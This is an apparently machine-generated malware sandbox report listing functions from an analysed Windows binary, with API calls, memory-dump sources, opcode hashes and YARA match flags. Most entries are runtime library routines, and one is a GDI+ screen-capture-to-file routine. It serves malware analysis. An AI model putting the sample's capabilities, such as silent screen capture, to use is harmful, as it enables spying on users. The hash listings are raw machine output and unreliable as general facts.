                                                                                                                                                                                                                                                                          • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                          • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                                                                                                                                                                                          Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pScheduler
                                                                                                                                                                                                                                                                          • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                                                          • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                          • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                                                                                                                                                                                          Function 024D08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC$v)D
                                                                                                                                                                                                                                                                          • API String ID: 3472968176-3108830043
                                                                                                                                                                                                                                                                          • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                          • Instruction ID: a059737e60c1912a5d80a254c9e92cc3e995245e3c42fc5c9e16dc28c3293416
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF04FB1A00514DFDB16FF65C4207AD3B65AF15B04F8690D7F4409B260CB785988CFA1
                                                                                                                                                                                                                                                                          Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                          • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                                                                                                                                                                                          Function 024BB36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                          • Instruction ID: 006eec99376c1a8a1ab609db585910f94663fa29755884bef5d9158dcdecbfbb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18716E719002169BCB228F59C884AFFBBB9FF5575CF54462BEC5157280DB708982CBB2
                                                                                                                                                                                                                                                                          Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00430B4F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00430B66
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00430B85
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00430BA0
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00430BB7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                          • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                                                                                                                                                                                          Function 024C0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                          • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                          • Instruction ID: 9183baee190f92fe4ff9971f9f8f290bd241a00a6d66dc2720c32f20ba4b289f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56518F79A00304EFDBA19F2ED841B6B77F5EF48724B24556EE809D7250E735E901CB80
                                                                                                                                                                                                                                                                          Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                                                          Function 024C1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction ID: 2e2d82ee6c473176e2bad6a2ac5dec20f0beca9c1cdcd249725ddaaaf771b6d9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B41A33AA012049FCB54DF7DC980A9EB7F6EF85714B2545AED919EB381D731E901CB80
                                                                                                                                                                                                                                                                          Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                                                            • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 313313983-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                          • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                                                          Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                                                            • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                          • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                          • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                                                          Function 024AB12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 024AB152
                                                                                                                                                                                                                                                                            • Part of subcall function 024A1188: _SpinWait.LIBCONCRT ref: 024A11A0
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024AB166
                                                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024AB198
                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 024AB21B
                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 024AB22A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                          • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                          • Instruction ID: acd93df21eb4b15ecb4f6cc5994a6528f2fc969a13f16d71c1480c1e42205113
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB315232904616DBCB11EFA4C9A06EEBBB2FF34348F04416FC8556B641CB716918CF90
                                                                                                                                                                                                                                                                          Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                                                                                                                                                                                          • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                                                                                                                                                                                          • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                                                                                                                                                                                          • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2357751836-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                          • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                                                                                                                                                                                          Function 024950C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 024950A3
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024950B7
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
                                                                                                                                                                                                                                                                          • __Getcoll.LIBCPMT ref: 0249512B
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2395760641-0
                                                                                                                                                                                                                                                                          • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                          • Instruction ID: c7e20b2a9d5f9da7fbf1080f6692a72461b94b7456312bff1bfa397b01fbbd0d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 072187B2818204AFDF02EFA5C485BDDBBB1BF54715F60800FE085AB280DBB49648CF95
                                                                                                                                                                                                                                                                          Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431FBF
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                          • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                                                                                                                                                                                          Function 024C21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(0249DAD7,0249DAD7,00000002,024BED35,024C3951,00000000,?,024B6A05,00000002,00000000,00000000,00000000,?,0249CF88,0249DAD7,00000004), ref: 024C21CA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C21FF
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2226
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C2233
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C223C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                          • Instruction ID: af4d423b540286f04ae6747c2631b2d365bb7bfb51b5fef4bc4894398fa3b5d6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701D63E2456003BD392AB2D5C44E1B262EABD2B72730012FFC15A6395EFF088028569
                                                                                                                                                                                                                                                                          Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                          • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                                                                                                                                                                                          Function 024C2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C21A0
